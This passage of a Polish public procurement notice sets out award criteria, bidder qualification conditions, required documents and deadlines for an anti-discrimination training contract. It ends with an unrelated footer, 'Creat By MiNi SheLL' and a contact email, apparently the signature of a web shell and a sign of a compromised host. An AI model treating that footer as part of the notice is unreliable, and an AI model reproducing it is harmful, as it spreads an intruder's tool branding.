class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-07-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert dokonana będzie według zasady procentowo-punktowej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kadry dydaktycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ust. 2 ustawy Pzp Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1)	W zakresie zdolności do występowania w obrocie gospodarczym.<br/> Posiadanie przez Wykonawcę aktualnego wpisu do właściwego rejestru lub ewidencji działalności gospodarczej.<br/>Oceny spełnienia tego warunku Zamawiający dokona na podstawie dołączonego do oferty oświadczenia Wykonawcy dotyczącego spełnienia warunków udziału w postępowaniu, aktualnego na dzień składania, na druku Zamawiającego, stanowiącym załącznik nr 3 do SWZ.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentu w przypadku wskazania przez niego w Formularzu ofertowym danych umożliwiających dostęp do tych dokumentów w ogólnopolskich i bezpłatnych bazach danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne.<br/>2)	W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. <br/> Posiadanie przez Wykonawcę wpisu do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy, właściwy ze względu na siedzibę Wykonawcy, aktualizowanego zgodnie z obowiązującymi przepisami w tym zakresie. <br/> Oceny spełnienia tego warunku Zamawiający dokona na podstawie dołączonego do oferty oświadczenia Wykonawcy dotyczącego spełnienia warunków udziału w postępowaniu, aktualnego na dzień składania, na druku Zamawiającego, stanowiącym załącznik nr 3 do SWZ i informacji w tym zakresie dostępnych w Rejestrze Instytucji Szkoleniowych na stronach internetowych Publicznych Służb Zatrudnienia.<br/> W FORMULARZU OFERTOWYM stanowiącym załącznik nr 1 do SWZ Wykonawca powinien wpisać numer wpisu do tego rejestru.<br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. <br/>3)	W zakresie sytuacji ekonomicznej lub finansowej <br/>Zamawiający nie stawia szczegółowych warunków w tym zakresie.<br/>4)	W zakresie zdolności technicznej lub zawodowej.<br/>a)	Posiadanie przez Wykonawcę doświadczenia w prowadzeniu szkoleń <br/>o tematyce podobnej do tematyki szkolenia będącego przedmiotem niniejszego postępowania, przez co Zamawiający rozumie przeprowadzenie <br/>w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej dwóch usług szkoleniowych o tematyce związanej z dyskryminacją/ przeciwdziałaniem dyskryminacji. Oceny spełnienia tego warunku Zamawiający dokona na podstawie dołączonego do oferty oświadczenia Wykonawcy dotyczącego spełnienia warunków udziału w postępowaniu, aktualnego na dzień składania, na druku Zamawiającego, stanowiącym załącznik nr 3 do SWZ. <br/>Ponadto Wykonawca, którego oferta została najwyżej oceniona, składa na wezwanie Zamawiającego sporządzony, na druku Zamawiającego stanowiącym załącznik nr 4 do SWZ - WYKAZ WYKONANYCH USŁUG SZKOLENIOWYCH wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane. Wraz z wykazem wykonawca załącza dowody określające czy te usługi zostały wykonane lub są wykonywane należycie, przy czym, dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy przed upływem terminu składania ofert. Wykaz, o którym wyżej mowa musi być aktualny na dzień jego złożenia.<br/><br/>Jeżeli Wykonawca wykaże usługi o szerszym zakresie, obejmujące zakres tematyczny będący przedmiotem niniejszego zamówienia w odpowiednich polach Wykazu usług szkoleniowych Wykonawca wykaże liczbę godzin szkolenia z zakresów wymaganych na spełnienie warunku doświadczenia tj. o tematyce związanej z dyskryminacją/ przeciwdziałaniem dyskryminacji.<br/>b)	Dysponowanie osobami zdolnymi do wykonania zamówienia, przez co Zamawiający rozumie posiadanie przez kadrę wykładowców kwalifikacji do prowadzenia danego szkolenia oraz stażu dydaktycznego. Kwalifikacje do prowadzenia zajęć w danym szkoleniu muszą wynikać z wykształcenia albo doświadczenia zawodowego w prowadzeniu szkoleń o tematyce związanej z dyskryminacją/ przeciwdziałaniem dyskryminacji. Przez staż pracy dydaktycznej rozumie się pracę jako nauczyciel, nauczyciel akademicki lub prowadzenie szkoleń jako trener wykładowca. Ponadto uprawnienia do prowadzenia zajęć muszą wynikać z obowiązujących w tym zakresie przepisów szczególnych. Zapis dotyczący wymaganego stażu pracy dydaktycznej stosuje się odpowiednio.<br/>	Oceny spełnienia tego warunku Zamawiający dokona na podstawie załączonego do oferty oświadczenia Wykonawcy dotyczącego spełnienia warunków udziału w postępowaniu, aktualnego na dzień składania ofert, na druku Zamawiającego, stanowiącym załącznik nr 3 do SWZ oraz WYKAZU KADRY DYDAKTYCZNEJ skierowanej do realizacji przedmiotowego zamówienia publicznego stanowiącego załącznik nr 5 do SWZ. <br/> Wykaz kadry dydaktycznej musi zawierać informacje na temat kwalifikacji zawodowych oraz doświadczenia w prowadzeniu szkoleń o tematyce związanej z dyskryminacją/ przeciwdziałaniem dyskryminacji, dedykowanych do wykonania niniejszego zamówienia publicznego, a także zakresu wykonywanych przez nich czynności takich jak tematy zajęć prowadzonych przez danego wykładowcę i liczbę godzin przeznaczonych na te tematy, realizowanych przez tego wykładowcę oraz informację o podstawie dysponowania tymi osobami. <br/>Informacje te stanowiły będą również podstawę do oceny w kryterium oceny ofert: „Doświadczenie kadry dydaktycznej w zrealizowaniu szkoleń o tematyce będącej przedmiotem niniejszego zamówienia”.<br/>Jeżeli po stronie Wykonawcy wystąpi konieczność zmiany kadry dydaktycznej, zmiana ta może być dokonana na pisemny wniosek Wykonawcy i wymaga zgody Zamawiającego. Wykładowca, który wejdzie w skład kadry dydaktycznej w wyniku tej zmiany musi mieć kwalifikacje i poziom wykształcenia nie niższy niż wykładowca, którego będzie zastępował oraz realizować taką samą liczbę godzin i taki sam zakres tematów. Wprowadzenie takiej zmiany możliwe jest na pisemny wniosek Wykonawcy po uzyskaniu pisemnej zgody Zamawiającego.<br/>W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/><br/>c)	Dysponowanie do realizacji szkolenia, adekwatną dla grupy 16-to osobowej, odpowiednio wyposażoną salę dydaktyczną , w szczególności w rzutnik multimedialny, tablicę flipchart, z osobnymi miejscami siedzącymi dla każdego uczestnika szkolenia, z odpowiednim oświetleniem, ogrzewaniem, wentylacją i akustyką oraz spełniającą wszystkie wymogi określone przepisami z zakresu BHP, a także dostosowaną do potrzeb osób z niepełnosprawnością oraz osób 55+, przez to rozumie się m.in. standard architektoniczny budynku, w którym będą odbywały się zajęcia szkoleniowe (winda, przystosowane toalety, miejsce parkingowe dla osób niepełnosprawnych).<br/>Szkolenie musi odbywać się na terenie województwa łódzkiego, poza powiatem zgierskim, z uwzględnieniem czasu przejazdu z m. Zgierz do miejsca, w którym odbywać się będzie szkolenie max. w 60 min. <br/>Sala dydaktyczna musi się znajdować w miejscu noclegu.<br/><br/> Oceny spełnienia tego warunku Zamawiający dokona na podstawie załączonego do oferty oświadczenia Wykonawcy dotyczącego spełnienia warunków udziału w postępowaniu, aktualnego na dzień składania, na druku Zamawiającego, stanowiącym załącznik nr 3 do SWZ i informacji zamieszczonych w FORMULARZU OFERTOWYM sporządzonym na druku Zamawiającego stanowiącym załącznik nr 1 do SWZ w wierszu: Miejsce szkolenia. <br/> Jeżeli po stronie Wykonawcy wystąpi konieczność zmiany miejsca szkolenia, zmiana ta może być dokonana na pisemny wniosek Wykonawcy i wymaga zgody Zamawiającego jak również wymagana będzie w takim przypadku zmiana umowy szkoleniowej w formie aneksu. <br/> Zmiana miejsca szkolenia jest dopuszczalna pod warunkiem, że nowe miejsce szkolenia zagwarantuje wszystkie podane w ofercie i zawartej umowie warunki lokalowe i wyposażenie w urządzenia, w tym dydaktyczne, nie gorsze niż określone w ofercie, na podstawie której dokonano wyboru najkorzystniejszej oferty.<br/>W przypadku wspólnego ubiegania się o zamówienie każdy z Wykonawców składa oświadczenie aktualne na dzień składania, na druku Zamawiającego, stanowiącym załącznik nr 3 do SWZ, w którym potwierdza brak podstaw do wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>W przypadku polegania na zdolnościach podmiotów udostępniających zasoby, Wykonawca załącza do oferty również oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw do wykluczenia tego podmiotu oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na zasoby aktualne na dzień składania, na druku Zamawiającego, stanowiącym załącznik nr 3 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Jeżeli wykonawca nie załączy do oferty wymaganych podmiotowych środków dowodowych, Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących dokumentów, aktualnych na dzień złożenia:<br/>a) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>b) zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Jeżeli wykonawca nie załączy do oferty wymaganych podmiotowych środków dowodowych, Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących dokumentów, aktualnych na dzień złożenia:<br/>a) WYKAZ WYKONANYCH USŁUG SZKOLENIOWYCH wraz z dowodami określającymi czy te usługi zostały wykonane lub są wykonywane należycie, o których mowa w części VII PODSTAWY WYKLUCZENIA Z POSTĘPOWANIA I WARUNKI UDZIAŁU W POSTĘPOWANIU pkt 3 ppkt 4 lit. a – załącznik nr 4 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty i oświadczenia wymagane od wykonawcy składającego ofertę: <br/><br/>1.	FORMULARZ OFERTOWY - załącznik nr 1 do SWZ oraz, jeżeli dotyczy, zobowiązania podmiotu do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia,<br/> Oferty nie należy składać na interaktywnym formularzu generowanym przez platformę E-zamówienia. <br/>2. PRELIMINARZ KOSZTÓW SZKOLENIA - załącznik nr 2 do SWZ.<br/>3. OŚWIADCZENIE O NIEPODLEGANIU WYKLUCZENIU Z POSTĘPOWANIA ORAZ SPEŁNIANIU WARUNKÓW UDZIAŁU W POSTĘPOWANIU - załącznik nr 3 do SWZ.<br/><br/>W przypadku wspólnego ubiegania się o zamówienie każdy z Wykonawców składa oświadczenie aktualne na dzień składania, na druku Zamawiającego, stanowiącym załącznik nr 3 do SWZ, w którym potwierdza brak podstaw do wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>W przypadku polegania na zdolnościach podmiotów udostępniających zasoby, Wykonawca załącza do oferty również oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw do wykluczenia tego podmiotu oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na zasoby aktualne na dzień składania, na druku Zamawiającego, stanowiącym załącznik nr 3 do SWZ.<br/><br/>4.	WYKAZ KADRY DYDAKTYCZNEJ - załącznik nr 5 do SWZ. <br/>5.	KLAUZULA INFORMACYJNA – załącznik nr 7 do SWZ<br/>6.	OŚWIADCZENIE RODO, jeżeli dotyczy – załącznik nr 8 do SWZ<br/><br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <br/><br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby. <br/><br/>7.	PEŁNOMOCNICTWO do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik. <br/>8.	Do oferty należy dołączyć dokumenty określające w szczególności zakres dostępnych wykonawcy zasobów tego podmiotu, sposób wykorzystania zasobów tego podmiotu przez Wykonawcę przy wykonywaniu zamówienia publicznego, zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego -jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2. Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>3. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>4. W przypadku wspólnego ubiegania się o udzielenie zamówienia oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców, w zakresie, w jakim wykazuje spełnienie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy szkoleniowej określone zostały w załączniku nr 6 do SWZ.<br/>Zamawiający dopuszcza możliwość zmiany treści zawartej umowy szkoleniowej tylko w sytuacjach niedających się przewidzieć do dnia upływu terminu składania ofert lub do dnia zawarcia umowy w zakresie:<br/>- zmiany miejsca szkolenia, pod warunkiem, że nowe miejsce szkolenia zagwarantuje wszystkie podane w ofercie i zawartej umowie warunki lokalowe i wyposażenie w urządzenia, w tym dydaktyczne, nie gorsze niż określone w ofercie, na podstawie której zawarto umowę, zmiana może być wprowadzona na pisemny wniosek wykonawcy po uzyskaniu akceptacji zamawiającego.<br/>- jeżeli po stronie Wykonawcy wystąpi konieczność zmiany kadry dydaktycznej, zmiana ta może być dokonana na pisemny wniosek Wykonawcy i wymaga zgody Zamawiającego. Wykładowca, który wejdzie w skład kadry dydaktycznej w wyniku tej zmiany musi mieć kwalifikacje i poziom wykształcenia nie niższy niż wykładowca, którego będzie zastępował oraz realizować taką samą liczbę godzin i taki sam zakres tematów. Wprowadzenie takiej zmiany możliwe jest na pisemny wniosek Wykonawcy po uzyskaniu pisemnej zgody Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-20 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Na podstawie art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego(Dz.U. 2025 r. poz. 514 z późn.zm.) z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124, z późn.zm.) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120, 295 i 1598 oraz 2024 r. poz. 619, 1685 i 1863 ) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.

Creat By MiNi SheLL
Email: jattceo@gmail.com